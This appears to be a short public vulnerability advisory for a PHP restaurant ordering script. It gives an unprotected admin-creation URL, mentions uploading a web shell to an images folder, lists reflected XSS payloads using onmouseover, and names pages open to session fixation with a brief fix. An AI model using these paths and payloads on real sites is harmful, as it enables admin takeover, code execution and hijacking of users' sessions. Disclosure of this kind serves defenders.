================================================================================
| # Title : Restaurant Script (PizzaInn_Project) Add Admin Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : RSv1.0.0
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Add Admin
| # Download : sourceforge.net/projects/restaurantmis/files/RSv1.0.0.zip/download
==================================================================================
add admin :
http://localhost/food/install/administration.php
you can add fod and upload shell find her http://localhost/3/images/oo.php
XSS :
/food/foodzone.php/%22onmouseover%3d'prompt(901513)'bad%3d%22>
/food/specialdeals.php/%22onmouseover%3d'prompt(938323)'bad%3d%22>
Session fixation :
Affected items
/admin/index.php
/contactus.php
/member-index.php
/register-exec.php
The impact of this vulnerability
An attacker can fixate (set) victim's session identifier.
How to fix this vulnerability
Web applications must ignore any session ID provided by the user's browser at login and must always generate a new session to which the user will log in if successfully authenticated.
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================